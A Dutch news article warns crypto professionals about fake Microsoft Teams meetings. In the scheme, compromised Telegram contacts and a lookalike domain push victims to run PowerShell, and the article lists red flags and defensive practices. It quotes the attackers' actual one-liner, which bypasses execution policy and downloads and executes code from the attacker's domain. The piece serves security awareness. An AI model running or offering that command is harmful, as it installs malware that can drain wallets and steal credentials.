Nepgesprekken in Microsoft Teams vormen een ernstige beveiligingsdreiging
Nieuwsdonderdag, 07 mei 2026 om 6:30
Een nieuwe golf van social-engineeringaanvallen richt zich op cryptoprofessionals via valse Microsoft Teams-vergaderingen, gecompromitteerde Telegram-accounts en kwaadaardige PowerShell-scripts die zijn ontworpen om inloggegevens te stelen, wallets leeg te trekken en op afstand toegang tot apparaten te krijgen.
Wat deze campagne gevaarlijk maakt, is niet alleen technische verfijning. Het is de mate van realisme. Aanvallers leunen niet meer op slecht geschreven phishingmails of doorzichtige oplichterij. Ze bouwen dagenlang vertrouwen op, doen zich voor als bekende branchecontacten, gebruiken legitieme planningshulpen zoals Calendly en creëren professionele vergadersettings die bijna identiek ogen aan echte Microsoft Teams-interfaces.
Voor crypto-oprichters, investeerders, ontwikkelaars, operators en zelfs PR-professionals weerspiegelt dit patroon een bredere verschuiving in cybercriminaliteit. De sector wordt steeds vaker via social engineering aangevallen in plaats van via directe infrastructuur-exploits, omdat mensen nog altijd makkelijker te manipuleren zijn dan geharde systemen.
Het incident, beschreven door een Web3-professional die een compromis ternauwernood voorkwam, laat scherp zien hoe deze aanvallen werken en waarom zelfs ervaren gebruikers erin kunnen trappen. Meerdere bronnen bespreken deze nieuwe scam. Wees alert!
De aanval start via een chat
De aanval startte via Telegram.
Een bekende contactpersoon uit de sector, naar verluidt een senior medewerker bij een prominente crypto-PR-agency, begon wat leek op een normaal professioneel gesprek. De chatgeschiedenis bestond al, waardoor de interactie authentiek overkwam. Er waren geen verdachte gebruikersnamen, nep-profielfoto’s of duidelijke rode vlaggen in het eerste contact.
Dat detail is cruciaal.
Moderne social-engineeringaanvallen vertrouwen steeds vaker op gecompromitteerde echte accounts in plaats van nieuw aangemaakte nep-profielen. Zodra aanvallers toegang krijgen tot een echt account, erven ze automatisch vertrouwen. Bestaande chatgeschiedenis, eerdere samenwerkingen en gedeelde contacten halen veel waarschuwingssignalen weg waar gebruikers op getraind zijn.
Na een kort gesprek stuurde de aanvaller een Calendly-uitnodiging voor een afspraak van 30 minuten, gevolgd door een Microsoft Teams-link.
Alles oogde professioneel.
De toon paste bij executive-communicatie. Het planproces zag er legitiem uit. De workflow leek op wat duizenden cryptoprofessionals wekelijks ervaren.
Juist die operationele geloofwaardigheid maakte de aanval effectief.
Mobieltjes niet welkom
Het eerste vreemde moment ontstond toen het slachtoffer de Teams-call via een mobiel toestel probeerde te openen.
In plaats van de vergadering te starten, verscheen een melding dat mobiele apparaten waren geblokkeerd door instellingen van de organisator.
Op het eerste gezicht leek dat plausibel. Veel enterprise-omgevingen leggen vergaderbeperkingen of authenticatieplichten op. In werkelijkheid was de blokkade waarschijnlijk doelbewust.
De aanvallers hadden het slachtoffer op een desktop of laptop nodig, omdat hun payload terminaltoegang en PowerShell-uitvoering vereiste.
Dit weerspiegelt een bredere evolutie in social engineering. Aanvallers ontwerpen scams steeds vaker rond gedragsmatige funnels in plaats van één phishingmoment.
Het proces was zorgvuldig geënsceneerd:
- Vertrouwen opbouwen via een bestaande relatie.
- Communicatie verplaatsen naar een professionele workflow.
- Een geloofwaardige technische hobbel introduceren.
- Urgentie creëren.
- Het doel richting bevoorrechte systeempaden duwen.
Het echte doel was nooit de Teams-call zelf. De call was slechts het bezorgkanaal voor malware-uitvoering.
Scammers gebruiken ander domein
Het in de aanval gebruikte domein was:
teams.livescalls.com
Op vluchtige blik lijkt het op een authentieke Microsoft-dienst.
Die gelijkenis is bewust.
De meeste gebruikers inspecteren domeinen niet nauwkeurig tijdens hun werk, zeker niet als ze multitasken of zich op een meeting voorbereiden. Aanvallers snappen dit en rekenen steeds vaker op “visuele legitimiteit” in plaats van technische complexiteit.
Legitieme Microsoft Teams-vergaderingen gebruiken doorgaans domeinen als:
- teams.microsoft.com
- teams.live.com
Het frauduleuze domein voegde een overtuigende naamstructuur toe die naadloos in de verwachte workflow past.
Dit is een van de belangrijkste lessen uit het incident.
Moderne phishinginfrastructuur probeert niet langer amateuristisch of opzichtig misleidend te lijken. Ze probeert operationeel vertrouwd te ogen.
Voor professionals die wekelijks tientallen calls, pitches, investeerdersmeetings en partnerships afhandelen, wordt familiariteit zo een kwetsbaarheid.
De werkelijke aanval liep via PowerShell
Eenmaal op desktop trof het slachtoffer wat leek op een professionele Microsoft Teams-interface.
De pagina verwees naar legitieme TeamsFx-SDK-informatie en noemde zelfs uitfaseringsdata die aansluiten op echte Microsoft-ontwikkeltools.
Wederom was realisme de strategie.
Daarna instrueerden de aanvallers het slachtoffer om een PowerShell-commando uit te voeren, zogenaamd nodig om een Teams-gerelateerd probleem op te lossen.
Het zichtbare script bevatte overtuigende variabelen zoals:
- TeamsFx_API_KEY
- MS_Teams_API_SECRET
Maar verborgen in het commando zat de echte payload:
powershell -ep bypass -c "(iwr -Uri https://teams.livescalls.com/developer/sdk/update/version/085697307 -UserAgent 'teamsdk' -UseBasicParsing).Content | iex"
Voor niet-technische gebruikers kan dit onschuldig lijken of te complex om in twijfel te trekken.
In werkelijkheid wijzen meerdere elementen direct op gevaar.
Wat gebeurt er echt?
Het commando bevat meerdere hoogrisicohandelingen:
- -ep bypass schakelt beschermingen van de PowerShell-uitvoeringspolicy uit.
- iwr downloadt externe content van een server buiten je netwerk.
- iex voert die content direct in het geheugen uit.
Die combinatie is extreem gevaarlijk.
Zo kunnen aanvallers malware dynamisch aanleveren en uitvoeren zonder dat de gebruiker een zichtbaar uitvoerbaar bestand downloadt.
Na uitvoering kan het script bijvoorbeeld:
- remote-access-trojans installeren
- browsersessies stelen
- wachtwoorden onderscheppen
- wallet-gegevens exfiltreren
- klembordactiviteit monitoren
- keyloggers inzetten
- persistentie-mechanismen installeren
- inloggegevens voor exchanges compromitteren
Voor cryptoprofessionals kunnen de gevolgen catastrofaal zijn, omdat wallet-compromis vaak tot onomkeerbaar verlies leidt.
In tegenstelling tot traditionele bankfraude is cryptodiefstal meestal definitief.
Waarom crypto (en AI) een doelwit is
Deze aanval was niet willekeurig.
Crypto- en Web3-professionals zijn uitzonderlijk aantrekkelijke doelwitten omdat zij het volgende combineren:
- hoogwaardige activa
- frequente crossplatformcommunicatie
- remote-first workflows
- internationaal netwerkverkeer
- publieke zichtbaarheid
- snelle transactiedynamiek
- zwakkere institutionele beveiliging dan traditionele finance
Veel oprichters en operators hebben regelmatig contact met:
- investeerders
- PR-bureaus
- exchanges
- market makers
- ontwikkelaars
- influencers
- journalisten
- conferentie-organisatoren
Dat zorgt voor constante blootstelling aan onbekende links, planningssystemen, pdf’s en vergaderverzoeken.
Aanvallers begrijpen dat deze workflows risico normaliseren.
Hoe meer meetings iemand heeft, hoe vaker de alertheid verslapt.
Dit is extra gevaarlijk in crypto, omdat social engineering aanvallen inmiddels vaak rendabeler zijn dan puur technische hacks.
In plaats van geharde infrastructuur frontaal aan te vallen, manipuleren aanvallers betrouwbare mensen om vrijwillig toegang te geven.
De psychologie achter de druk
Een van de belangrijkste aspecten was niet de malware zelf, maar de psychologische druk.
Toen het slachtoffer aarzelde, schakelde de aanvaller direct over op geruststelling.
Berichten luidden onder meer:
- “Maak je geen zorgen, het is heel simpel en veilig voor jou.”
- “Partners zijn al aangesloten.”
- “De meeting is al bezig.”
Deze mix van geruststelling en urgentie is een klassieke social-engineeringtactiek.
De aanvaller wilde:
- wantrouwen verlagen
- analytisch denken verminderen
- sociale druk creëren
- angst om anderen te hinderen uitbuiten
- compliance versnellen vóór de controle toeneemt
Dit is belangrijk, want de meeste succesvolle social-engineeringaanvallen benutten emotie, niet onwetendheid.
Slachtoffers zijn vaak slimme professionals onder tijdsdruk.
Het doel is niet om mensen absurde claims te laten geloven, maar om normaal verificatiegedrag kort te onderbreken zodat een riskante handeling plaatsvindt.
De grootste waarschuwingstekens
Meerdere waarschuwingssignalen doken tijdens de interactie op.
Los van elkaar lijken ze misschien klein.
Samen vormden ze een duidelijk aanvalspatroon.
Belangrijke Rode Vlaggen (Red Flags)
1. Een Vergadering Vereist Terminalcommando’s
Geen enkele legitieme Microsoft Teams-vergadering vereist PowerShell-commando’s om deel te nemen.
Dit alleen al moet de interactie meteen stoppen.
Elke vergaderdienst die vraagt om terminalcommando’s is een ernstig beveiligingsrisico.
2. Het Domein Past Niet Bij De Beweerde Dienst
Controleer URL’s zorgvuldig.
Lookalike-domeinen blijven effectief omdat professionals vaak scannen in plaats van te verifiëren.
Kleine verschillen zijn cruciaal.
3. Mobiele Toegang Wordt Zonder Duidelijke Reden Geblokkeerd
Kunstmatige beperkingen zijn vaak gedragssturing.
In dit geval blokkeerden de aanvallers waarschijnlijk bewust mobiele apparaten omdat de exploit desktopuitvoering vereiste.
4. Druk En Urgentie Nemen Toe Bij Aarzeling
Legitieme zakelijke contacten dringen zelden aan op het uitschakelen van beveiliging of het draaien van scripts.
Escalerende urgentie wijst vaak op kwade bedoelingen.
5. Alternatieve Platforms Worden Afgewezen
Toen het slachtoffer voorstelde om naar Google Meet te verplaatsen, weigerde de aanvaller.
Dat was veelzeggend.
De operatie hing af van de valse Teams-omgeving.
Scammers verzetten zich vaak tegen platformwissels omdat hun aanval alleen werkt binnen een gecontroleerde setup.
De belangrijkste Do’s en Don’ts
Bewustzijn van cybersecurity is in crypto niet langer optioneel.
De operationele omgeving is simpelweg te vijandig.
De volgende praktijken verlagen het risico aanzienlijk.
DO: Controleer vergaderlinks mauwkeurig
Inspecteer altijd het volledige domein voordat je deelneemt.
Aanvallers rekenen op visuele gelijkenis en afleiding.
Bookmark waar mogelijk legitieme vergaderplatforms in plaats van uitsluitend op gemailde of gechatte links te vertrouwen.
DO: Bevestig ongewone verzoeken via een ander kanaal
Als een bekend contact plots vraagt om software te installeren, terminalcommando’s uit te voeren of ongewone workflows te volgen, verifieer dit onafhankelijk.
Bel ze.
Stuur een spraakbericht.
Gebruik een ander platform.
Gecompromitteerde accounts komen steeds vaker voor.
DO: Behandel PowerShell-Commando’s als hoog risico
De meeste niet-technische professionals zouden nooit PowerShell-commando’s moeten uitvoeren die via chat of videogesprekken worden aangeleverd.
Als uitvoering écht nodig is, betrek dan eerst interne IT of security.
DO: Gebruik gescheiden apparaten voor hoogwaardige wallet-activiteit
Dedicated apparaten voor wallets verkleinen het aanvalsoppervlak aanzienlijk.
Idealiter:
- gebruik een aparte laptop voor treasurybeheer
- isoleer signing devices
- vermijd browsen en communicatie op walletsysteem
- gebruik waar mogelijk hardware wallets
Operationele scheiding is essentieel.
DO: Schakel overal Multi-Factor Authenticatie in
MFA stopt niet elke aanval, maar verhoogt de kosten van compromittering aanzienlijk.
Gebruik bij voorkeur app-based authenticators of hardware-keys.
Vermijd sms-gebaseerde MFA voor accounts met hoge waarde.
DO: Onderwijs teams continu
Veel organisaties zien security awareness nog als een eenmalige onboarding.
Dat is niet meer genoeg.
Aanvalstechnieken evolueren voortdurend.
Securitytraining moet operationeel en doorlopend worden.
DON’T: Voer geen scripts uit die je niet begrijpt
Dit is een van de belangrijkste regels in moderne cybersecurity.
Aanvallers verbergen steeds vaker malware in scripts die administratief of technisch lijken.
Kun je niet uitleggen wat een commando doet, voer het dan niet uit.
DON’T: Ga niet uit van veiligheid door bestaande chatgeschiedenis
Gecompromitteerde echte accounts zijn inmiddels een veelgebruikt aanvalskanaal.
Vertrouwen moet continu worden gevalideerd.
Historische legitimiteit garandeert geen huidige legitimiteit.
DON’T: Negeer geen kleine inconsistenties
Veel geavanceerde aanvallen slagen omdat slachtoffers kleine onregelmatigheden wegredeneren.
Voorbeelden zijn:
- ongebruikelijke URL’s
- onhandige workflowwijzigingen
- onnodige technische stappen
- vreemde urgentie
- weerstand tegen alternatieve communicatiekanalen
Kleine inconsistenties duiden vaak op een groter compromis.
DON’T: Laat wallets niet openstaan
Hot wallets die aan de browser zijn gekoppeld, vergroten het risico aanzienlijk.
Hoe meer dagelijkse taken een apparaat afhandelt, hoe groter het aanvalsoppervlak.
Segmentatie is cruciaal.
DON’T: Zie social engineering niet als “gewone phishing”
Die mindset is achterhaald.
Moderne social-engineeringoperaties lijken steeds meer op inlichtingenwerk en psychologische beïnvloeding.
Sommige aanvallers besteden dagen of weken aan geloofwaardigheid voordat ze toeslaan.
Dit is niet langer spamniveau-cybercrime.
Het is operationele misleiding.
Waarom deze dreiging waarschijnlijk toeneemt
De bredere betekenis gaat verder dan één valse Teams-call.
Het toont hoe cybercriminelen zich aanpassen aan:
- AI-gegenereerde content
- realistische impersonatie
- remote werkomgevingen
- gedecentraliseerde organisaties
- wereldwijd verspreide teams
- steeds waardevollere crypto-ecosystemen
Naarmate AI-tools verbeteren, zullen aanvallers waarschijnlijk creëren:
- nog overtuigender nepdeelnemers
- AI-gegenereerde stemnabootsing
- real-time phishingaanpassing
- synthetische executive-communicatie
- geautomatiseerde vertrouwensopbouw
De operationele kwaliteit van scams stijgt snel.
Dat creëert een grote asymmetrie.
Verdedigers moeten continu waakzaam blijven.
Aanvallers hebben maar één moment van succes nodig.
Wat je nu direct kunt (en moet) doen
AI-bedrijven, Cryptobedrijven, fondsen, DAO’s, exchanges en Web3-startups moeten dit incident als waarschuwing zien.
Meerdere operationele aanpassingen worden steeds noodzakelijker:
Verplicht securitybeleid
Organisaties moeten duidelijke regels instellen die het volgende verbieden:
- terminalcommando’s uitvoeren tijdens calls
- niet-goedgekeurde software-installaties
- wallet-activiteit op niet-beheerde apparaten
- delen van inloggegevens via chatapps
Verificatieprocedures voor meetings
Gesprekken met hoge waarde moeten het volgende omvatten:
- geverifieerde domeinen
- geauthenticeerde plansystemen
- verificatie van bekende deelnemers
- gestandaardiseerde communicatiekanalen
Apparaatsegmentatie
Medewerkers die treasury, governance of operationele infrastructuur beheren, moeten werken in gesegmenteerde omgevingen met minder blootstelling.
Organisaties moeten vooraf gedefinieerde workflows aanhouden voor:
- accountcompromis
- wallet-exposure
- malware-indamming
- credential-rotatie
- opschalen van communicatie
Snelheid is cruciaal na een compromis.
Lees ook
Het gaat niet om Microsoft Teams
De kern van het verhaal is vertrouwen.
Aanvallers misbruiken steeds vaker de onzichtbare aannames die modern digitaal werk mogelijk maken.
Mensen vertrouwen op:
- vertrouwde interfaces
- bestaande contacten
- professionele toon
- workflowconsistentie
- herkenbare branding
Cybercriminelen begrijpen dat operationeel vertrouwen nu een van de meest waardevolle aanvalsoppervlakken is in de digitale economie.
Voor cryptoprofessionals zijn de inzet nog hoger, omdat één gecompromitteerd systeem direct kan leiden tot financieel verlies, reputatieschade, governance-compromis of institutionele blootstelling.
De les is niet simpelweg “wees voorzichtig met links.”
Het is dat social engineering een geprofessionaliseerde industrie is geworden.
En in veel gevallen lijken de aanvallers allang niet meer op oplichters.
Bronmateriaal en redactioneel kader ontleend aan geüploade documenten.
Populair nieuws
Laatste reacties
- Op 1 april 2028 komt er een AI die al het kantoorwerk van alle Nederlanders overneemt. Heb ik van horen zeggen.
RobinHeester01-04-2026 - AI moet een tool zijn. Maar net als Excel, je e-mailbox of Photoshop: die tool kan steeds meer voor je doen als je het de juiste input geeft. Dat ligt bij dokters en andere soortgelijke zaken wel wat gevoeliger. ;)RobinHeester01-04-2026
- Er komt ook extra inkomsten belasting op mensen die met ai hun geld verdienen. De maarregel gaat in op 1 aprill 2027. Er is nog een jaar om een andere baan te vinden.max01-04-2026
- Als ik dit lees moet ik terugdenken aan de tijd, dat ik als IT specialist, dat woord bestond toen nog niet, een programma schreef om de de maagontlediging te meten met een gamma camera.de patient eet een radioactieve pannekoek en eet die op. Je zet de patiënt voor een gammacamera die de verplaatsing van de radioactieviteit in de patient meet. Daar rolt een cijfer uit. De arts die naast mij zat om de uitkomst van de meeting te evalueren zat naast met en zei. Dat is mooi de computer heeft het berekend en die maakt géén fouten. Ik ben bang dat de jonge artsen van nu op AI gaan vertrouwen want die begrijpen niets van hoe AI tot de diagnose komt. Hun ervaring met AI en de patiënten is beide heel miniium. Voordat je met AI gaat werken moet je helaas goed beseffen dat AI fouten maakt, maar vaak zo praat of schrijft dat het een waarheid als een koe is. Een eenvoudige systeem prompt "Als je het niet weet zeg dan gewoon: ik weet het niet niet." Bracht een ai systeem zodanig in de war dat er geen antwoord meer kwam. Het systeem moest van zichzelf altijd antwoord geven. Jonge medicie moeten zich er terdege van bewust zijn dat je boven de stof moet staan en dan pas AI als ondersteuning mag gebruiken bij de diagnose voor echte mensen.max31-03-2026
- Heel veel modems doen dat als voorbeeld het ASUS TUF Gaming AX6000 modem dat staat gewoon in de voorwaarden. Wel kun je dat vermijden met Open-wrt te draaien.max13-03-2026
- fascinerend hoe juist bij Martin (die tegen AI in de rechtszaal staat) de verdenking opduikt.. dat ondermijnt vertrouwen op twee fronten.ai_arjanb11-11-2025
- Waarom geen “safety-by-default” met opt-in voor losser gedrag, plus crisis-detectie en directe verwijzing naar hulpdiensten?martijn_aiz30-10-2025
- voor mij werkt AI het best als snelle “co-pilot” voor analyse, maar de eindbeslissing hoort bij mensen.neuraalnicoy30-10-2025
- Sterk stuk! Dit onderstreept waarom “AI bias” en “betrouwbaarheid van AI” cruciaal zijn voor onderwijs en bedrijfslevenkevinkunstmatigh30-10-2025
- Als D66 de verkenner en mogelijk premier levert, dan wordt de toon technocratisch en pragmatischoptimaliserenotto3230-10-2025
Loading